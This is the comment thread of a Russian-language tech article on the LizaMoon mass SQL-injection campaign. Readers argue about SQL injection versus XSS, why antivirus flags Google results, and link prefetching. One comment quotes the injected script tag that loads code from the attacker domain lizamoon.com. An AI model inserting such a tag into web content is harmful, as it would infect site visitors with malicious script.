Pull to refresh

Comments 30

Что интересно, почти все инфицированные сайты базируются на технологии ASP(X) и немного ColdFusion.
угу, а днсы на CNMSN :)
Человек явно любит микрософт.
Интересно, это дыра в Microsoft Windows?
желтые заголовки такие желтые
UFO just landed and posted this here
И Аваст кричит, что вирус.

Напрашивается вопрос: а как в результатах поиска гугла появляется вредоносный код?..
UFO just landed and posted this here
Без перехода к указанному файлу ur.php, то бишь без знания антивирусом его содержимого? Я же к самому ur.php не обращаюсь, насколько я понимаю. Обращаюсь к индексу гугла же?
UFO just landed and posted this here
Ну вот, сломал Аваст, он перестал кричать на страницу гугла.

В любом случае, вот в вашем же сообщении тот же код, и ничего?
В сообщении это текст, а не код.
Просто хочу разобраться, как так происходит.

Сообщение абы откуда не возьмется, это ведь тоже код:
<div class="entry-content-only">
					    Окей, тогда антивирус видит в сырце странице следущий код:
<code>script src=http://lizamoon.com/ur.php</code>

Ваш К.О.
					</div>


Во-вторых, в гугле же, насколько я понимаю, выводятся те же сообщения, только из индекса. Никто к этим файлам не обращается, браузер обращается к странице результатов? Браузер должен сработать на обращение к проблемному файлу, а не на его упоминание, так ведь? Или я чего не понимаю?
Существует такая технология, как предзагрузка страниц (Link prefetching, habrahabr.ru/blogs/google/74123/). Во-всяком случае в хроме когда-то обещали
itc.ua/news/google_rabotaet_nad_uskoreniem_zagruzki_stranic_v_chrome_49877
и в Firefox'е оно должно работать. Я не уверен точно, но возможно антивирусы орут именно из-за link prefetching.
В выдаче гугла это тоже текст, а не код.
Какая разница что инжектить через sql иньекцию?
Объясните плиз, почему SQL-Injection? Я всегда считал что это XSS…
Таки да. Тоже непонятно, с чего здесь SQL инъекция. При SQL инъекции можно провести XSS, но она не может быть проиндексирована в ПС, если ее явно не опубликовали.
потому что уязвимость, с помощью которой скрипт попал в базу, это sql инъекция.
SQL-инекция в том, что внесли этот XSS напрямую в базу, наверно, в обход защит, если таковые имелись.
А вот про XSS — это уже другая тема…
Лучше б рассказали, как они sql-инъекцию туда присунули
Наверно, через какую-то дыру в софте на сервере. Судя по первым комментариям этого топика.
> Домен lizamoon.com зарегистрирован четыре дня назад на явно фиктивные данные.
> [тут идёт какая-то сраная картинка]

И вот объясните мне, зачем несколько строк обычного текста (plain text) вставлять в виде картинки? Что помешало текст вставить просто в виде текста?

В следующий раз, пожалуйста, отпринтскринте экран с этим текстом (обязательно весь экран целиком!), сохраните эту картинку через Photoshop, вставьте эту картинку в MS Word, сохраните в виде DOC-файла, заархивируйте этот файл в RAR, залейте его на какой-нибудь поганый файлхостинг и вставьте в статью ссылку на эту файлопомойку.
Мы же айтишники, мы очень любим, когда несколько строчек обычного текста нам передают именно в таком виде.
Sign up to leave a comment.

Articles